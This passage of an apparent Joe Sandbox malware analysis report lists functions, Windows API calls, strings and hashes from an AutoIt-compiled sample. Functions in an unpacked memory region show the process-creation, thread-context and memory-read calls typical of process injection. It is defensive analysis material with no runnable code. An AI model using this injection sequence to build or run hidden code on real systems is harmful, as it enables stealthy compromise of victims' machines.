Instruction ID: fc03829deb175e5a343ced77f5aec8d0afbfa209b17146b0e1659f15028598ee
Opcode Fuzzy Hash: 7d67ddf34c2dcba83e40f83fdd70fa77ad9fe29717ef062755188d65179dc766
Instruction Fuzzy Hash: 8C212970900345EBEB20DFA4FC49BAD7BB0EB18711F00411AE500AA3E1D7B556529BA8

Function 00C63633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00C636D2
KillTimer.USER32(?,00000001), ref: 00C636FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C6371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C6372A
CreatePopupMenu.USER32 ref: 00C6373E
PostQuitMessage.USER32(00000000), ref: 00C6374D

Strings

TaskbarCreated, xrefs: 00C63725

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: d2892de5776461d0c87056f773e134f5043a121a50fc679a33871078b364c054
Instruction ID: 798fe4d2d45cde5fe47547eb6312d96f780d63f42800bdaefe5a55b021ebe2c7
Opcode Fuzzy Hash: d2892de5776461d0c87056f773e134f5043a121a50fc679a33871078b364c054
Instruction Fuzzy Hash: D44123B2204685BBDB345F68FD89F7D3A54FB61300F140129F512D63A5CAB09F42A275

Function 00C63766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3OutputDebug, xrefs: 00C63892
CMDLINE, xrefs: 00C63822
/AutoIt3ExecuteLine, xrefs: 00C638A7
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00C637AE
/ErrorStdOut, xrefs: 00C6387D
/AutoIt3ExecuteScript, xrefs: 00C638BC
CMDLINERAW, xrefs: 00C637FB

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 8cde5bca6477ccf1901b8388dd2e1d2718c52e4b3e8caac438078532ac66d362
Instruction ID: 80e9fc6e926e25e6b34a80a5e1f016d93f6bf79f8d23092c925a97c602993db7
Opcode Fuzzy Hash: 8cde5bca6477ccf1901b8388dd2e1d2718c52e4b3e8caac438078532ac66d362
Instruction Fuzzy Hash: 53A15A7290026DDACF25EBA0DC95EEEB7B8BF24310F00052AF416B7191EF745A09DB60

Function 010157E0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010158B1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01015AD7

Memory Dump Source

Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction ID: fa8a11e3674d73c5f2af140d23d961446e1a7e408b93c821d0df77955a8868ad
Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction Fuzzy Hash: 2CA14A71E40209EBDB14CFA4C894BEEBBB5FF89304F208199E541BB284D7799A40CF94

Function 00C89AE6 Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__init_pointers.LIBCMT ref: 00C89AE6

Part of subcall function 00C83187: EncodePointer.KERNEL32(00000000), ref: 00C8318A
Part of subcall function 00C83187: __initp_misc_winsig.LIBCMT ref: 00C831A5
Part of subcall function 00C83187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C89EA0
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C89EB4
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C89EC7
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C89EDA
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C89EED
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C89F00
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00C89F13
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C89F26
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C89F39
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C89F4C
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C89F5F
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C89F72
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C89F85
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C89F98
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C89FAB
Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C89FBE

__mtinitlocks.LIBCMT ref: 00C89AEB
__mtterm.LIBCMT ref: 00C89AF4

Part of subcall function 00C89B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C89AF9,00C87CD0,00D1A0B8,00000014), ref: 00C89C56
Part of subcall function 00C89B5C: _free.LIBCMT ref: 00C89C5D
Part of subcall function 00C89B5C: DeleteCriticalSection.KERNEL32(00D1EC00,?,?,00C89AF9,00C87CD0,00D1A0B8,00000014), ref: 00C89C7F

__calloc_crt.LIBCMT ref: 00C89B19
__initptd.LIBCMT ref: 00C89B3B
GetCurrentThreadId.KERNEL32 ref: 00C89B42

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 1f9f6d78eb52f01580336b452be941501bcb894863c56622b369c96c39cbd57a
Instruction ID: d276f01c75b6f7723a5221a608a12b1a34c7d2e933946cbd889c1a3daa73cce6
Opcode Fuzzy Hash: 1f9f6d78eb52f01580336b452be941501bcb894863c56622b369c96c39cbd57a
Instruction Fuzzy Hash: E6F062325097116AE63477747C076BA2790DB0273CF284A1AF460D61D2EF309941676C

Function 00C639D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C63A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C63A24
ShowWindow.USER32(00000000,?,?), ref: 00C63A38
ShowWindow.USER32(00000000,?,?), ref: 00C63A41

Strings

AutoIt v3, xrefs: 00C639FB, 00C63A00, 00C63A01
edit, xrefs: 00C63A1E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ea06c0776b0775d17acf41ccb179cdcde5d31e57fccfdd2a3f0fccdca5cd1389
Instruction ID: fa2a5bb528d8007fac23e2275f3b3d4f1eb5021ad04cf246e8f2574da5b15320
Opcode Fuzzy Hash: ea06c0776b0775d17acf41ccb179cdcde5d31e57fccfdd2a3f0fccdca5cd1389
Instruction Fuzzy Hash: 0CF03A71500390BEEA3057237C48F3B3E7DDBD6F60B00006EB900E62B4C6720842DAB4

Function 010155C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 010154B0: Sleep.KERNELBASE(000001F4), ref: 010154C1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010156D1

Strings

1Q2VPAKER92EQOAITPJO9, xrefs: 01015734, 01015737

Memory Dump Source

Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd

Similarity

API ID: CreateFileSleep
String ID: 1Q2VPAKER92EQOAITPJO9
API String ID: 2694422964-2526339149
Opcode ID: 94b5803e9ae62285d63d449f3b4a9e84c890f9adeb699dab800ae4b2089273b2
Instruction ID: e01594e831b243bc40b9b4c4a9ac481b6ba1d732777a8ad84b591e3692eb4a23
Opcode Fuzzy Hash: 94b5803e9ae62285d63d449f3b4a9e84c890f9adeb699dab800ae4b2089273b2
Instruction Fuzzy Hash: 2051A130D04249DBEF11DBA4DC59BEEBBB8AF45304F044199E2487B2C1D6B91B48CBA5

Function 00C6407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C9D3D7

Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06

_memset.LIBCMT ref: 00C640FC
_wcscpy.LIBCMT ref: 00C64150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C64160

Strings

Line: , xrefs: 00C9D400

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 75165580aee0f3bc49294e986f3935c1cf2347833609dc4d0bb217390da3765f
Instruction ID: 0052b0a1a83049c01cebdc9eb52a6fe491a62d2bfc689a1c3ece48f1ef315b29
Opcode Fuzzy Hash: 75165580aee0f3bc49294e986f3935c1cf2347833609dc4d0bb217390da3765f
Instruction Fuzzy Hash: 3A31CF71008304AFD734EB60EC89FEE77E8AF50304F104A1AF595921E1DB709649D7A6

Function 00C6686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00C64DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C64E0F

_free.LIBCMT ref: 00C9E263
_free.LIBCMT ref: 00C9E2AA

Part of subcall function 00C66A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C66BAD

Strings

Bad directive syntax error, xrefs: 00C9E292
>>>AUTOIT SCRIPT<<<, xrefs: 00C9E039

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 040a93527664a26cb950b3c6d0a90cc53289ca9873e81d06fe56367dc2057872
Instruction ID: 39b4e070dae3ac82cb773ddee3b5875d592635f63c1d763f3b6ee6554a472e3e
Opcode Fuzzy Hash: 040a93527664a26cb950b3c6d0a90cc53289ca9873e81d06fe56367dc2057872
Instruction Fuzzy Hash: 7D919F71900219EFCF14EFA4CC859EDB7B4FF18314F14452AF815AB2A1DB71AA05EB50

Function 00C635B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C635A1,SwapMouseButtons,00000004,?), ref: 00C635D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C635A1,SwapMouseButtons,00000004,?,?,?,?,00C62754), ref: 00C635F5
RegCloseKey.KERNELBASE(00000000,?,?,00C635A1,SwapMouseButtons,00000004,?,?,?,?,00C62754), ref: 00C63617

Strings

Control Panel\Mouse, xrefs: 00C635D2

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 68a80c8d10838058966dd45f2702416d439596971beb330bdc9af4da5e8f0f05
Instruction ID: 244f26960c7f9142bb2e7d020babe0f1afb727af3597c836223c1c2fe738d05c
Opcode Fuzzy Hash: 68a80c8d10838058966dd45f2702416d439596971beb330bdc9af4da5e8f0f05
Instruction Fuzzy Hash: 72114571614258BFDB208F68DC80AEEBBB8FF04740F008469F805DB210E271DF419BA4

Function 010144B0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01014C6B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01014D01
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01014D23

Memory Dump Source

Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
Instruction ID: 2ed8ecd423a7818dcf9d70cb7e40a3266aba11925228ea37483cce086b88937f
Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
Instruction Fuzzy Hash: 57620D30A142589BEB24CFA4CC50BDEB776EF58300F1091A9D14DEB3A4E7799E81CB59

Function 00CC955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00C64EE5: _fseek.LIBCMT ref: 00C64EFD

Part of subcall function 00CC9734: _wcscmp.LIBCMT ref: 00CC9824
Part of subcall function 00CC9734: _wcscmp.LIBCMT ref: 00CC9837

_free.LIBCMT ref: 00CC96A2
_free.LIBCMT ref: 00CC96A9
_free.LIBCMT ref: 00CC9714

Part of subcall function 00C82D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C89A24), ref: 00C82D69
Part of subcall function 00C82D55: GetLastError.KERNEL32(00000000,?,00C89A24), ref: 00C82D7B

_free.LIBCMT ref: 00CC971C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 183a99bda4263e733f18aafc9593474540aca0fdf5e1767623e3eec118477817
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 64516FB1D04258AFDF249FA4CC85B9EBBB9EF48304F10449EF209A3241DB715A81DF59

Function 00C8470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C847A0
__flush.LIBCMT ref: 00C847C0
__write.LIBCMT ref: 00C847F3
__flsbuf.LIBCMT ref: 00C84821

Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 68ca233be166be5f732dced856693e6dbfecc299b687b0d5e3c2f7fc41cf9d42
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: D041B775A007479BDB1CEF69C8809AE77A6EF4536CB24853DE825C7680EB70DE41CB48

Function 00C644A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C644CF

Part of subcall function 00C6407C: _memset.LIBCMT ref: 00C640FC
Part of subcall function 00C6407C: _wcscpy.LIBCMT ref: 00C64150
Part of subcall function 00C6407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C64160

KillTimer.USER32(?,00000001,?,?), ref: 00C64524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C64533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C9D4B9

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: c9bb11205c818d4533b9b28042d8ade3b41e6b813dede394714e2ed4b221777c
Instruction ID: a651ffc8a8af62247f1e014857dd95fd1ac0bb0c7bd2e26d01db1c056b09f584
Opcode Fuzzy Hash: c9bb11205c818d4533b9b28042d8ade3b41e6b813dede394714e2ed4b221777c
Instruction Fuzzy Hash: 4521D7745047949FEB328B249899BEBBBEC9F15314F0400DDE79FAB281C3742A85DB51

Function 00C67285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9EA39
GetOpenFileNameW.COMDLG32(?), ref: 00C9EA83

Part of subcall function 00C64750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C64743,?,?,00C637AE,?), ref: 00C64770

Part of subcall function 00C80791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C807B0

Strings

X, xrefs: 00C9EA51

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 1f3e8e3694b963ced71edf51f380e7c8729fe0d6a91b5a13e57f417c59b48535
Instruction ID: d78c0df51c27a5ff2fe286a47d644d984b15522351fc3139ea8256c28654d377
Opcode Fuzzy Hash: 1f3e8e3694b963ced71edf51f380e7c8729fe0d6a91b5a13e57f417c59b48535
Instruction Fuzzy Hash: CD21C330A00258ABCF51DF94D889BEE7BF8AF49314F00405AE408EB381DFB45989DFA1

Function 00CC98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00CC98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CC990F

Strings

aut, xrefs: 00CC9909

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 4ab77829d93e3a32bf9e2e85d36d85559210d85e5fe27ab3875356de93be34db
Instruction ID: 0b145240a64ed076314f15d113409f39ee4f00eb4cdd4516f9d5f506487e3ae9
Opcode Fuzzy Hash: 4ab77829d93e3a32bf9e2e85d36d85559210d85e5fe27ab3875356de93be34db
Instruction Fuzzy Hash: 55D05E7994030DBBDB50DBA4EC8EFDA773CE704700F0002B1BB94990A1EEB095999BA1

Function 00CDCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b409dbdce516ea31de780fbf6570d991c93366a0f4e13ab33b258d676274253f
Instruction ID: 925b0983a718331f544ec59acd5d8d139d012252572933cd5cc1dd45148b84be
Opcode Fuzzy Hash: b409dbdce516ea31de780fbf6570d991c93366a0f4e13ab33b258d676274253f
Instruction Fuzzy Hash: 94F129716083419FCB14DF29C484A6ABBE5FF88314F14892EF9A99B351D731E945CF82

Function 00C6F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C80162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C80193
Part of subcall function 00C80162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C8019B
